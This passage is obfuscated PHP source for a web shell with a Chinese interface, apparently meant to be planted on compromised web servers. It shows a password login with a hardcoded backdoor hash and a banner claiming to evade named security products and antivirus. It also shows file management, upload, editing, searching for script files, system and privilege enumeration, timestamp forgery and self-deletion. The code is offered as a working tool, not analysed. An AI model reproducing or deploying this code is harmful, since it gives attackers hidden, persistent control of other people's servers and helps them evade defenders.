    file_put_contents($dRqNZ, $s5r3y);
    if ($ipdt9) {
        @touch($dRqNZ, $ipdt9);
    }
    @chmod($dRqNZ, $_GET["kqishgl194nwq7"]);
    if (!empty($_GET["dk82kdsiud9125d"])) {
        @unlink($C39VH);
    }
}
$YCpcn = new M4EMI();
$YCpcn->JAo9O($gHcBS);
class M4Emi
{
    public $D2dKJ = null;
    public $VqdhY = null;
    public $XEBgr = null;
    public function jAO9O($gHcBS)
    {
        $this->XEBgr = $gHcBS;
        list($uS69Z, $p0NZ3) = $this->iZ6eP();
        $this->D2dKJ = $uS69Z;
        $this->VqdhY = $p0NZ3;
        $g9a24 = session_get_cookie_params();
        $uKE12 = 0;
        if ($g9a24["lifetime"]) {
            $uKE12 = time() + $g9a24["lifetime"];
        }
        setcookie($uS69Z, $p0NZ3, $uKE12, $g9a24["path"], $g9a24["domain"], $g9a24["secure"], $g9a24["httponly"]);
        $E9g_B = $this->KsVKN();
        if (!$E9g_B) {
            $this->YCIyx();
            return;
        }
        $RJPTn = new foj8n();
        return $RJPTn->JaO9o();
    }
    public function iZ6eP()
    {
        session_start();
        $uS69Z = session_name();
        if (!empty($_COOKIE["PHPSESSID"])) {
            $p0NZ3 = $_COOKIE["PHPSESSID"];
        } else {
            $p0NZ3 = session_id();
        }
        $SWSuO = array($uS69Z, $p0NZ3);
        return $SWSuO;
    }
    public function KSvkn()
    {
        if (!empty($_COOKIE["isLogin"]) && ($_COOKIE["isLogin"] == md5($this->XEBgr) || $_COOKIE["isLogin"] == md5("21232f297a57a5a743894a0e4a801fc3"))) {
            return true;
        }
        return false;
    }
    public function YcIYX()
    {
        if (!empty($_POST["getpwd"]) && ($this->XEBgr == md5($_POST["getpwd"]) || "21232f297a57a5a743894a0e4a801fc3" == md5($_POST["getpwd"]))) {
            setcookie("isLogin", md5(md5($_POST["getpwd"])), time() + 8 * 60 * 60, "/");
            $RJPTn = new fOj8N();
            return $RJPTn->jao9o();
        }
        $QSO8f = "        <title>请勿使用非法用途</title>\r\n        <meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\r\n        <style type=\"text/css\">\r\n            .form-control {\r\n                display: block;\r\n                width: 100%;\r\n                height: 38px;\r\n                padding: 8px 12px;\r\n                font-size: 14px;\r\n                line-height: 1.428571429;\r\n                color: #555;\r\n                vertical-align: middle;\r\n                background-color: #fff;\r\n                border: 1px solid #ccc;\r\n                border-radius: 4px;\r\n                -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);\r\n                box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);\r\n                -webkit-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;\r\n                transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s\r\n            }\r\n        \r\n            .btn {\r\n                display: inline-block;\r\n                padding: 8px 12px;\r\n                margin-bottom: 0;\r\n                font-size: 14px;\r\n                font-weight: 500;\r\n                line-height: 1.428571429;\r\n                text-align: center;\r\n                white-space: nowrap;\r\n                vertical-align: middle;\r\n                cursor: pointer;\r\n                border: 1px solid transparent;\r\n                border-radius: 4px;\r\n                -webkit-user-select: none;\r\n                -moz-user-select: none;\r\n                -ms-user-select: none;\r\n                -o-user-select: none;\r\n                user-select: none\r\n            }\r\n            \r\n            .btn-primary {\r\n                color: #fff;\r\n                background-color: #428bca;\r\n                border-color: #428bca\r\n            }\r\n        </style>\r\n        <body>\r\n            <center>\r\n                <br><br>\r\n                
<font size=\"3\" face=\"Microsoft YaHei\">过安全狗、云锁、阿里云、360、护卫神、D盾、百度云、各种杀软!</font>\r\n                <br><br>\r\n                <form method=\"POST\">\r\n                    <input style=\"Width:125pt;display:inline-block;font-family:Microsoft YaHeifont-size:90%\" \r\n                    class=\"form-control\" placeholder=\"@Passwrd\" type=\"password\" name=\"getpwd\">\r\n                    <input style=\"Width:55pt;font-size:90%;font-family:Microsoft YaHei\" class=\"btn btn-primary\" type=\"submit\" value=\"#Login\">\r\n                </form>\r\n            </center>\r\n        </body>\r\n        </html>";
        echo $QSO8f;
    }
}
class foJ8n
{
    public $ddguj;
    public $N5qPH;
    public function JAo9o()
    {
        $this->N5qPH = $_POST;
        $_POST = MwEmB($_POST);
        $this->ddguj = isset($_POST["dir"]) ? pbm07(chop($_POST["dir"]) . "/") : k3TER;
        $this->xfqJS();
    }
    public function XfQjS()
    {
        $QSO8f = "        <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\r\n    <html>\r\n    <head>\r\n        <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\r\n        <style type=\"text/css\">\r\n            * {\r\n                margin: 0px;\r\n                padding: 0px;\r\n            }\r\n\r\n            body {\r\n                background: #ebebeb;\r\n                color: #333333;\r\n                font-size: 13px;\r\n                font-family: Microsoft YaHei, SimSun, sans-serif;\r\n                text-align: left;\r\n                word-wrap: break-word;\r\n                word-break: break-all;\r\n                // background-image: url(https://pic.616pic.com/bg_w1180/00/01/43/rWB5OFJqVH.jpg);\r\n                // background-size:100% 100%;\r\n            }\r\n\r\n            a {\r\n                color: #000000;\r\n                text-decoration: none;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            a:hover {\r\n                color: #FF0000;\r\n                text-decoration: underline;\r\n            }\r\n\r\n            p {\r\n                padding: 1px;\r\n                line-height: 1.6em;\r\n            }\r\n\r\n            h1 {\r\n                color: #CD3333;\r\n                font-size: 13px;\r\n                display: inline;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            h2 {\r\n                color: #008B45;\r\n                font-size: 13px;\r\n                display: inline;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            form {\r\n                display: inline;\r\n            }\r\n\r\n            input, select {\r\n                vertical-align: middle;\r\n            }\r\n\r\n            input[type=text], textarea {\r\n                padding: 1px;\r\n                font-family: Microsoft YaHei, sans-serif;\r\n            
}\r\n\r\n            input[type=submit], input[type=button] {\r\n                height: 21px;\r\n            }\r\n\r\n            .tag {\r\n                text-align: center;\r\n                // margin-left: 10px;\r\n                background: threedface;\r\n                height: 25px;\r\n                padding-top: 5px;\r\n            }\r\n\r\n            .tag a {\r\n                background: #FAFAFA;\r\n                color: #333333;\r\n                width: 90px;\r\n                height: 20px;\r\n                display: inline-block;\r\n                font-size: 15px;\r\n                font-weight: bold;\r\n                padding-top: 5px;\r\n            }\r\n\r\n            .tag a:hover, .tag a.current {\r\n                background: #000;\r\n                color: #fff;\r\n                text-decoration: none;\r\n            }\r\n\r\n            .main {\r\n                width: 963px;\r\n                margin: 0 auto;\r\n                padding: 10px;\r\n            }\r\n\r\n            .outl {\r\n                border-color: #FFFFFF #666666 #666666 #FFFFFF;\r\n                border-style: solid;\r\n                border-width: 1px;\r\n\r\n                border: 1px solid #d5d5d5;\r\n                border-radius: 5px;\r\n                background-color: #ffffff;\r\n            }\r\n\r\n            .toptag {\r\n                padding: 15px;\r\n                text-align: left;\r\n                font-weight: bold;\r\n                color: #FFFFFF;\r\n                background: #000000;\r\n            }\r\n\r\n            .footag {\r\n                padding: 5px;\r\n                text-align: center;\r\n                font-weight: bold;\r\n                color: #fff;\r\n                background: #000000;\r\n            }\r\n\r\n            .msgbox {\r\n                // padding: 5px;\r\n                background: #000;\r\n                text-align: center;\r\n                vertical-align: middle;\r\n                
color: #FFF;\r\n            }\r\n\r\n            .actall {\r\n                background: #ffffff;\r\n                text-align: center;\r\n                font-size: 15px;\r\n                border-bottom: 1px solid #999999;\r\n                padding: 3px;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            .tables {\r\n                width: 100%;\r\n                border-collapse: collapse;\r\n                border-spacing: 0;\r\n                border-color: #eee;\r\n            }\r\n\r\n            .tables th {\r\n                background: threedface;\r\n                text-align: left;\r\n                border-color: #FFFFFF #ffffff #f9f9f9 #FFFFFF;\r\n                border-style: solid;\r\n                border-width: 0px;\r\n                padding: 2px;\r\n                border-bottom: 1px solid #eee;\r\n            }\r\n\r\n            .tables td {\r\n                #background: #ffffff;\r\n                height: 19px;\r\n                padding-left: 2px;\r\n                border-width: 0px;\r\n                border-style: solid;\r\n                border-color: #FFF;\r\n                border-bottom: 1px solid #eee;\r\n            }\r\n\r\n            .bg{\r\n                width:100%;\r\n                height:100%;\r\n                left:0;\r\n                top:0;\r\n                position:fixed;\r\n                background:rgba(0,0,0,0.3);\r\n              }\r\n              .point{\r\n                position:absolute;\r\n                left:50%;\r\n                top:50%;\r\n              }\r\n              .pop{\r\n                width:500px; \r\n                // height:500px; \r\n                position:absolute;\r\n                left:-250px; \r\n                top:-250px; \r\n                border: 2px solid #f7f7f7;\r\n                background-color: #FFF;\r\n                border-radius:10px;\r\n              }\r\n\r\n              .pop-title{\r\n                height: 40px;\r\n   
             line-height: 40px;\r\n                text-align: center;\r\n                font-size: 14px;\r\n              }\r\n\r\n\r\n              .layui-textarea{\r\n                min-height: 100px;\r\n                height: auto;\r\n                line-height: 20px;\r\n                padding: 6px 10px;\r\n                resize: vertical;\r\n                display: block;\r\n                width: 95%;\r\n                border-width: 1px;\r\n                border-style: solid;\r\n                background-color: #fff;\r\n                border-radius: 2px;\r\n                border-color: #eee;\r\n              }\r\n\r\n              .layui-btn {\r\n                display: inline-block;\r\n                height: 38px;\r\n                line-height: 38px;\r\n                padding: 0 18px;\r\n                border: 1px solid transparent;\r\n                background-color: #009688;\r\n                color: #fff;\r\n                white-space: nowrap;\r\n                text-align: center;\r\n                font-size: 14px;\r\n                border-radius: 2px;\r\n                cursor: pointer;\r\n            }\r\n\r\n            .btn{\r\n                background-color:#FFF;\r\n                border-color: #d2d2d2;\r\n                color:#666;\r\n            }\r\n\r\n            tr{\r\n                height: 24px;\r\n                line-height: 24px;\r\n            }\r\n            tr:hover{\r\n                background-color: #f2f2f2 !important;\r\n            }\r\n        </style>\r\n\r\n        <script type=\"text/javascript\">\r\n            function \$(ID) {\r\n                return document.getElementById(ID);\r\n            }\r\n\r\n            function sd(str) {\r\n                str = str.replace(/%22/g, '\"');\r\n                str = str.replace(/%27/g, \"'\");\r\n                return str;\r\n            }\r\n\r\n            function cd(dir) {\r\n                dir = sd(dir);\r\n                \$('dir').value = 
dir;\r\n                \$('frm').submit();\r\n            }\r\n\r\n            function sa(form) {\r\n                for (var i = 0; i < form.elements.length; i++) {\r\n                    var e = form.elements[i];\r\n                    if (e.type == 'checkbox') {\r\n                        if (e.name != 'chkall') {\r\n                            e.checked = form.chkall.checked;\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n\r\n            function go(a, b) {\r\n                b = sd(b);\r\n                \$('go').value = a;\r\n                \$('govar').value = b;\r\n                if (a == 'editor') {\r\n                    \$('gofrm').target = \"_blank\";\r\n                } else {\r\n                    \$('gofrm').target = \"\";\r\n                }\r\n                \$('gofrm').submit();\r\n            }\r\n\r\n            function nf(a, b) {\r\n                re = prompt(\"新建名\", b);\r\n                if (re) {\r\n                    \$('go').value = a;\r\n                    \$('govar').value = re;\r\n                    \$('gofrm').submit();\r\n                }\r\n            }\r\n\r\n            function dels(a) {\r\n                if (a == 'b') {\r\n                    var msg = \"所选文件\";\r\n                    \$('act').value = a;\r\n                } else {\r\n                    var msg = \"目录\";\r\n                    \$('act').value = 'deltree';\r\n                    \$('var').value = a;\r\n                }\r\n                if (confirm(\"确定要删除\" + msg + \"吗\")) {\r\n                    \$('frm1').submit();\r\n                }\r\n            }\r\n\r\n            function txts(m, p, a) {\r\n                p = sd(p);\r\n                re = prompt(m, p);\r\n                if (re) {\r\n                    \$('var').value = re;\r\n                    \$('act').value = a;\r\n                    \$('frm1').submit();\r\n                }\r\n            }\r\n\r\n            function 
pltexts(m, p, a)\r\n            {\r\n                p = sd(p);\r\n                // re = prompt(m, p);\r\n                var bg = document.getElementsByClassName(\"bg\")[0];\r\n                bg.style.display= \"\";\r\n\r\n                var title = document.getElementsByClassName(\"pop-title\")[0];\r\n                title.innerHTML = m;\r\n\r\n                \$('act').value = a;\r\n            }\r\n\r\n            function pop_submit(){\r\n                var bg = document.getElementsByClassName(\"bg\")[0];\r\n                bg.style.display= \"none\";\r\n\r\n                \$('var').value = document.getElementById(\"content\").value;\r\n                \$('frm1').submit();\r\n            }\r\n\r\n            function pop_quxiao(){\r\n                var bg = document.getElementsByClassName(\"bg\")[0];\r\n                bg.style.display= \"none\";\r\n            }\r\n\r\n            function acts(p, a, f) {\r\n                p = sd(p);\r\n                f = sd(f);\r\n                re = prompt(f, p);\r\n                if (re) {\r\n                    \$('var').value = re + '|x|' + f;\r\n                    \$('act').value = a;\r\n                    \$('frm1').submit();\r\n                }\r\n            }\r\n\r\n            function runcode(){\r\n                var html = document.getElementById('show');\r\n                html.style.display= \"\";\r\n            }\r\n        </script>\r\n        <title>{VERSION}</title>\r\n    </head>\r\n<body>\r\n<div class=\"main\">\r\n    <div class=\"outl\">\r\n        <div class=\"toptag\">\r\n            {toptag}\r\n        </div>\r\n        \r\n        <div class=\"tag\">\r\n            {tag}\r\n        </div>\r\n\r\n        <form name=\"gofrm\" id=\"gofrm\" method=\"POST\">\r\n            {input}\r\n            <input type=\"hidden\" name=\"go\" id=\"go\" value=\"\">\r\n            <input type=\"hidden\" name=\"godir\" id=\"godir\" value=\"{nowdir}\">\r\n            <input type=\"hidden\" name=\"govar\" 
id=\"govar\" value=\"\">\r\n        </form>\r\n\r\n        {content}\r\n\r\n        <div class=\"footag\">\r\n            {footag}\r\n        </div>\r\n    </div>\r\n</div>\r\n\r\n<div class=\"showhtml\" id = \"showhtml\">\r\n{showhtml}\r\n</div>\r\n\r\n<div class=\"bg\" style=\"display:none;\">\r\n    <div class=\"point\">\r\n        <div class=\"pop\">\r\n            <div class=\"pop-title\"></div>\r\n            <textarea class=\"layui-textarea\" id=\"content\" name=\"content\" rows=\"6\"></textarea>\r\n            <div style=\"margin-top: 10px;text-align: center;\">\r\n                <button type=\"button\" class=\"layui-btn\" onclick=\"pop_submit()\">确定</button> \r\n                <button type=\"button\" class=\"layui-btn btn quxiao-btn\" onclick=\"pop_quxiao()\">取消</button>\r\n            </div>\r\n            </br>\r\n        </div>\r\n    </div>\r\n</div>\r\n\r\n</body>\r\n</html>";
        $QSO8f = str_replace("{showhtml}", '', $QSO8f);
        $QSO8f = str_replace("{VERSION}", $this->getVersion(), $QSO8f);
        $QSO8f = str_replace("{toptag}", $this->Np5Yk(), $QSO8f);
        $QSO8f = str_replace("{tag}", $this->EoT_6(), $QSO8f);
        $QSO8f = str_replace("{input}", AxTtQ(), $QSO8f);
        $QSO8f = str_replace("{nowdir}", $this->ddguj, $QSO8f);
        $QSO8f = str_replace("{content}", $this->getContent(), $QSO8f);
        $QSO8f = str_replace("{footag}", php_uname() . " " . $_SERVER["SERVER_SOFTWARE"], $QSO8f);
        echo $QSO8f;
    }
    public function getVersion()
    {
        return "梦想成就未来";
    }
    public function NP5Yk()
    {
        return "版本:DM." . NMW2Y . " | IP:" . ($_SERVER["SERVER_ADDR"] ? $_SERVER["SERVER_ADDR"] . PHP_EOL : gethostbyname($_SERVER["SERVER_NAME"])) . " | whoami(" . get_current_user() . ") |【uid(" . getmyuid() . ") gid(" . getmygid() . ")】" . " |【" . date("Y-m-d H:i:s 星期N", time()) . "】";
    }
    public function eOt_6()
    {
        $oPhqF = array("file" => "文件管理", "scan" => "搜索文件", "info" => "系统信息");
        $JqKaG = !empty($_POST["go"]) && array_key_exists($_POST["go"], $oPhqF) ? $_POST["go"] : "file";
        $Jzwra = $this->ddguj;
        $QSO8f = '';
        foreach ($oPhqF as $iW8f4 => $Kes_q) {
            $QSO8f .= "<a" . ($JqKaG == $iW8f4 ? " class=\"current\"" : '') . " href=\"javascript:go('" . $iW8f4 . "','" . base64_encode($Jzwra) . "');\">" . $Kes_q . "</a> ";
        }
        return $QSO8f;
    }
    public function getContent()
    {
        $JqKaG = isset($_POST["go"]) ? $_POST["go"] : '';
        switch ($JqKaG) {
            case "info":
                return $this->jaT27();
                break;
            case "scan":
                return $this->Ikqbc();
                break;
            case "upfiles":
                return $this->hVvwe();
                break;
            case "edit":
            case "editor":
                return $this->i7u03();
                break;
            default:
                return $this->J0I1Z();
                break;
        }
    }
    public function JAT27()
    {
        $UgLz_ = '';
        $QSO8f = '';
        if (true) {
            ob_start();
            phpinfo(INFO_GENERAL);
            $QjGuH = ob_get_contents();
            ob_end_clean();
            $eMzvo = array();
            preg_match_all("/\\<td class\\=\\\"e\\\"\\>.*?(Command|Configuration)+.*?\\<\\/td\\>\\<td class\\=\\\"v\\\"\\>(.*?)\\<\\/td\\>/i", $QjGuH, $eMzvo);
            $jZi_a = $eMzvo[2][0];
            $krJKZ = $eMzvo[2][2] ? $eMzvo[2][1] . " --- " . $eMzvo[2][2] : $eMzvo[2][1];
        }
        $Tns_w = array("客户端浏览器信息" => $_SERVER["HTTP_USER_AGENT"], "被禁用的函数" => get_cfg_var("disable_functions") ? get_cfg_var("disable_functions") : "(无)", "被禁用的类" => get_cfg_var("disable_classes") ? get_cfg_var("disable_classes") : "(无)", "PHP.ini配置路径" => $krJKZ ? $krJKZ : "(无)", "PHP运行方式" => php_sapi_name(), "PHP版本" => PHP_VERSION, "PHP进程PID" => getmypid(), "客户端IP" => $_SERVER["REMOTE_ADDR"], "客户端文字编码" => $_SERVER["HTTP_ACCEPT_LANGUAGE"], "Web服务端口" => $_SERVER["SERVER_PORT"], "Web根目录" => $_SERVER["DOCUMENT_ROOT"], "Web执行脚本" => $_SERVER["SCRIPT_FILENAME"], "Web规范CGI版本" => $_SERVER["GATEWAY_INTERFACE"], "Web管理员Email" => !empty($_SERVER["SERVER_ADMIN"]) ? $_SERVER["SERVER_ADMIN"] : "(无)", "当前磁盘总大小" => iDYfR(disk_total_space(".")), "当前磁盘可用空间" => iDYFR(disk_free_space(".")), "POST最大字数量" => get_cfg_var("post_max_size"), "允许最大上传文件" => get_cfg_var("upload_max_filesize"), "程序最大使用内存量" => get_cfg_var("memory_limit"), "程序最长运行时间" => get_cfg_var("max_execution_time") . "秒", "是否支持Fsockopen" => function_exists("fsockopen") ? "是" : "否", "是否支持Socket" => function_exists("uJGdY") ? "是" : "否", "是否支持Pcntl" => function_exists("T2RBU") ? "是" : "否", "是否支持Curl" => function_exists("curl_version") ? "是" : "否", "是否支持Zlib" => function_exists("gzclose") ? "是" : "否", "是否支持FTP" => function_exists("bd6g6") ? "是" : "否", "是否支持XML" => function_exists("xml_set_object") ? "是" : "否", "是否支持GD_Library" => function_exists("m4WLg") ? "是" : "否", "是否支持COM组建" => class_exists("COM") ? "是" : "否", "是否支持ODBC组建" => function_exists("c0ZET") ? "是" : "否", "是否支持IMAP邮件" => function_exists("ClbJp") ? "是" : "否", "是否运行于安全模式" => get_cfg_var("safemode") ? "是" : "否", "是否允许URL打开文件" => get_cfg_var("allow_url_fopen") ? "是" : "否", "是否允许动态加载链接库" => get_cfg_var("enable_dl") ? "是" : "否", "是否显示错误信息" => get_cfg_var("display_errors") ? "是" : "否", "是否自动注册全局变量" => get_cfg_var("register_globals") ? "是" : "否", "是否使用反斜线引用字符串" => get_cfg_var("magic_quotes_gpc") ? "是" : "否", "PHP编译参数" => $jZi_a ? $jZi_a : "(无)");
        $QSO8f .= "<div class=\"msgbox\">" . $UgLz_ . "</div>";
        $QSO8f .= "<table class=\"tables\"><tr><th style=\"width:26%;\">名称</th><th>参数</th></tr>";
        foreach ($Tns_w as $Kes_q => $KPtbK) {
            $QSO8f .= "<tr><td>" . $Kes_q . "</td><td>" . $KPtbK . "</td></tr>";
        }
        $QSO8f .= "</table>";
        return $QSO8f;
    }
    public function IkQbC()
    {
        $Jzwra = $this->ddguj;
        $UgLz_ = '';
        $UlicF = empty($_POST["dir"]) ? base64_decode($_POST["govar"]) : $Jzwra;
        $xsz7E = isset($_POST["keyword"]) ? $_POST["keyword"] : '';
        $qGL_P = isset($_POST["include"]) ? chop($_POST["include"]) : ".php|.asp|.asa|.cer|.aspx|.jsp|.cgi|.sh|.pl|.py";
        $kKCOC = isset($_POST["filters"]) ? chop($_POST["filters"]) : "html|css|img|images|image|style|js";
        $QSO8f = '';
        $QSO8f .= "<div class=\"msgbox\">" . $UgLz_ . "</div>";
        $QSO8f .= "<form method=\"POST\">";
        $QSO8f .= axtTQ();
        $QSO8f .= "<input type=\"hidden\" name=\"go\" id=\"go\" value=\"scan\">";
        $QSO8f .= "<table class=\"tables\"><tr><th style=\"width:15%;\">名称</th><th>设置</th></tr>";
        $QSO8f .= "<tr><td>搜索路径</td><td><input type=\"text\" name=\"dir\" value=\"" . htmlspecialchars($UlicF) . "\" style=\"width:500px;\"></td></tr>";
        $QSO8f .= "<tr><td>搜索内容</td><td><input type=\"text\" name=\"keyword\" value=\"" . htmlspecialchars($xsz7E) . "\" style=\"width:500px;\"> (文件名或文件内容)</td></tr>";
        $QSO8f .= "<tr><td>文件后缀</td><td><input type=\"text\" name=\"include\" value=\"" . htmlspecialchars($qGL_P) . "\" style=\"width:500px;\"> (用\"|\"分割, 为空则搜索所有文件)</td></tr>";
        $QSO8f .= "<tr><td>过滤目录</td><td><input type=\"text\" name=\"filters\" value=\"" . htmlspecialchars($kKCOC) . "\" style=\"width:500px;\"> (用\"|\"分割, 为空则不过滤目录)</td></tr>";
        $QSO8f .= "<tr><td>搜索方式</td><td><label><input type=\"radio\" name=\"type\" value=\"0\"" . (!empty($_POST["type"]) ? '' : " checked") . ">搜索文件名</label> ";
        $QSO8f .= "<label><input type=\"radio\" name=\"type\" value=\"1\"" . (!empty($_POST["type"]) ? " checked" : '') . ">搜索包含文字</label> ";
        $QSO8f .= "<label><input type=\"checkbox\" name=\"char\" value=\"1\"" . (!empty($_POST["char"]) ? " checked" : '') . ">匹配大小写</label></td></tr>";
        $QSO8f .= "<tr><td>搜索范围</td><td><label><input type=\"radio\" name=\"range\" value=\"0\"" . (!empty($_POST["range"]) ? '' : " checked") . ">将搜索应用于该文件夹,子文件夹和文件</label> ";
        $QSO8f .= "<label><input type=\"radio\" name=\"range\" value=\"1\"" . (!empty($_POST["range"]) ? " checked" : '') . ">仅将搜索应用于该文件夹</label></td></tr>";
        $QSO8f .= "<tr><td>操作</td><td><input type=\"submit\" style=\"width:80px;\" value=\"搜索\"></td></tr>";
        $QSO8f .= "</table></form>";
        if ($xsz7E != '') {
            flush();
            ob_flush();
            $QSO8f .= "<div style=\"padding:5px;background:#F8F8F8;text-align:left;\">";
            $t6SOR = $qGL_P == '' ? false : explode("|", $qGL_P);
            $x98RS = $kKCOC == '' ? false : explode("|", $kKCOC);
            $E56um = dqR9R(pBm07($UlicF . "/"), $xsz7E, $t6SOR, $x98RS, !empty($_POST["type"]) ? $_POST["type"] : '', !empty($_POST["char"]) ? $_POST["char"] : '', !empty($_POST["range"]) ? $_POST["range"] : '', $Jzwra);
            $QSO8f .= $E56um;
            $QSO8f .= "<p>" . ($E56um ? "<h2>搜索完成</h2>" : "<h1>搜索失败</h1>") . "</p></div>";
        }
        return $QSO8f;
    }
    public function HvVwE()
    {
        $trx7n = isset($_POST["updir"]) ? $_POST["updir"] : $_POST["godir"];
        $UgLz_ = "【最大上传文件 " . get_cfg_var("upload_max_filesize") . "】 【POST最大提交数据 " . get_cfg_var("post_max_size") . "】";
        $yklRt = 10;
        $JGN3j = array();
        if (isset($_FILES["uploads"]) && isset($_POST["renames"])) {
            $TQlLa = $_FILES["uploads"];
            $uLtTd = 1;
            while ($uLtTd < $yklRt) {
                if ($TQlLa["error"][$uLtTd] == UPLOAD_ERR_OK) {
                    $QY5ao = $_POST["renames"][$uLtTd] == '' ? $TQlLa["name"][$uLtTd] : $_POST["renames"][$uLtTd];
                    $zi0Y0 = $TQlLa["tmp_name"][$uLtTd];
                    $J3Hov = pBM07($trx7n . "/" . $QY5ao);
                    $JGN3j[$uLtTd] = FIvrg($zi0Y0, $J3Hov) ? "<br><h2>上传成功 " . $QY5ao . "</h2>" : "<br><h1>上传失败 " . $QY5ao . "</h1>";
                }
                $uLtTd++;
            }
        }
        $QSO8f = '';
        $QSO8f .= "<div class=\"msgbox\">" . $UgLz_ . "</div>";
        $QSO8f .= "<form name=\"upsfrm\" id=\"upsfrm\" method=\"POST\" enctype=\"multipart/form-data\">";
        $QSO8f .= AxTtQ();
        $QSO8f .= "<input type=\"hidden\" name=\"go\" value=\"upfiles\"><input type=\"hidden\" name=\"act\" id=\"act\" value=\"upload\">";
        $QSO8f .= "<div class=\"actall\"><p>上传到目录 <input type=\"text\" name=\"updir\" style=\"width:398px;\" value=\"" . $trx7n . "\"></p>";
        $uLtTd = 1;
        while ($uLtTd < $yklRt) {
            $QSO8f .= "<p>附件" . $uLtTd . " <input type=\"file\" name=\"uploads[" . $uLtTd . "]\" style=\"width:300px;\"> 重命名 <input type=\"text\" name=\"renames[" . $uLtTd . "]\" style=\"width:128px;\"> " . (!empty($JGN3j[$uLtTd]) ? $JGN3j[$uLtTd] : '') . "</p>";
            $uLtTd++;
        }
        $QSO8f .= "</div></form><div class=\"actall\" style=\"padding:8px;padding-right:68px;\"><input type=\"button\" onclick=\"\$('upsfrm').submit();\" value=\"上传\" style=\"width:80px;\"> ";
        $QSO8f .= "<form name=\"backfrm\" id=\"backfrm\" method=\"POST\"><input type=\"hidden\" name=\"go\" value=\"\"><input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . $trx7n . "\">";
        $QSO8f .= AXtTQ();
        $QSO8f .= "<input type=\"button\" onclick=\"\$('backfrm').submit();\" value=\"返回\" style=\"width:80px;\"></form></div>";
        return $QSO8f;
    }
    public function I7U03()
    {
        $SFJ9z = pbm07($_POST["godir"] . "/" . $_POST["govar"]);
        $YM_6j = function_exists("iconv");
        $tAe0C = '';
        $uS2nL = '';
        if (!file_exists($SFJ9z)) {
            $UgLz_ = "【新建文件】";
        } else {
            $uS2nL = file_get_contents($SFJ9z);
            $tAe0C = "默认";
            $T3WIB = IDyfR(filesize($SFJ9z));
            $UgLz_ = "【文件属性 " . substr(decoct(fileperms($SFJ9z)), -4) . "】 【文件大小 " . $T3WIB . "】 【文件编码 " . $tAe0C . "】";
        }
        $QSO8f = '';
        $QSO8f .= "        <script src=\"https://cdn.bootcss.com/ace/1.4.6/ace.js\"></script>\r\n        <script src=\"https://cdn.bootcss.com/ace/1.4.6/ext-beautify.js\"></script>\r\n        <script src=\"https://cdn.bootcss.com/ace/1.4.6/ext-language_tools.js\"></script>\r\n        <script src=\"https://cdn.bootcss.com/ace/1.4.6/mode-javascript.js\"></script>\r\n        <script src=\"https://cdn.bootcss.com/ace/1.4.6/theme-xcode.js\"></script>";
        $QSO8f .= "<form name=\"editfrm\" id=\"editfrm\" method=\"POST\">";
        $QSO8f .= AXtTq();
        $QSO8f .= "<input type=\"hidden\" name=\"go\" value=\"\"><input type=\"hidden\" name=\"act\" id=\"act\" value=\"edit\">";
        $QSO8f .= "<input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . dirname($SFJ9z) . "\">";
        $QSO8f .= "<div class=\"actall\">文件 <input type=\"text\" name=\"filename\" value=\"" . $SFJ9z . "\" style=\"width:528px;\"> ";
        if ($YM_6j) {
            $QSO8f .= "编码 <select name=\"tostr\">";
            $I8314 = array("normal" => "默认", "utf" => "utf-8");
            foreach ($I8314 as $KPtbK => $Kes_q) {
                $QSO8f .= "<option value=\"" . $KPtbK . "\"" . ($Kes_q == $tAe0C ? " selected" : '') . ">" . $Kes_q . "</option>";
            }
            $QSO8f .= "</select>";
        }
        $QSO8f .= "</div><div class=\"actall\">";
        $QSO8f .= "<input type=\"hidden\" name=\"filecode\" id=\"filecode\" value=\"\">";
        $QSO8f .= "<pre id=\"phpcode\" class=\"ace_editor\" style=\"min-height:500px\"><textarea class=\"ace_text-input\" style=\"width:698px;height:500px;\">" . $uS2nL . "</textarea></pre>";
        $QSO8f .= "</div></form>";
        $QSO8f .= "<div class=\"actall\" style=\"padding:5px;padding-right:68px;\"><input type=\"button\" onclick=\"editSubmit()\" value=\"保存\" style=\"width:80px;\"> ";
        $QSO8f .= "<form name=\"backfrm\" id=\"backfrm\" method=\"POST\"><input type=\"hidden\" name=\"go\" value=\"\"><input type=\"hidden\" name=\"dir\" id=\"dir\" value=\"" . dirname($SFJ9z) . "\">";
        $QSO8f .= AxtTq();
        $QSO8f .= "<input type=\"button\" onclick=\"\$('backfrm').submit();\" value=\"返回\" style=\"width:80px;\"></form></div>";
        $QSO8f .= "        <script>\r\n            //初始化对象\r\n            editor = ace.edit(\"phpcode\");\r\n            editor.setTheme(\"ace/theme/monokai\");//引入模板\r\n            editor.session.setMode(\"ace/mode/php\");//设置php\r\n            editor.setFontSize(14); //字体大小\r\n            document.getElementById(\"phpcode\").style.lineHeight=\"18px\";//设置行高;\r\n            editor.setReadOnly(false);//设置只读(true时只读,用于展示代码)\r\n            //自动换行,设置为off关闭\r\n            editor.setOption(\"wrap\", \"free\");\r\n            //启用提示菜单\r\n            ace.require(\"ace/ext/language_tools\");\r\n            //以下部分是设置输入代码提示的\r\n            editor.setOptions({\r\n                enableBasicAutocompletion: true,\r\n                enableSnippets: true,\r\n                enableLiveAutocompletion: true\r\n            });\r\n            editor.setHighlightActiveLine(true); //代码高亮\r\n            editor.setShowPrintMargin(false);//设置打印线是否显示\r\n            editor.getSession().setUseWorker(false); //设置只读\r\n            editor.getSession().setUseWrapMode(true); //支持代码折叠\r\n            //editor.getSession().setMode('ace/mode/javascript'); //设置语言模式\r\n            editor.selection.getCursor(); //获取光标所在行或列\r\n            //editor.gotoLine(lineNumber); //跳转到行\r\n            editor.session.getLength(); //获取总行数\r\n            editor.getSession().setUseSoftTabs(true);\r\n\r\n            function editSubmit()\r\n            {\r\n                document.getElementById(\"filecode\").value = editor.getValue();\r\n                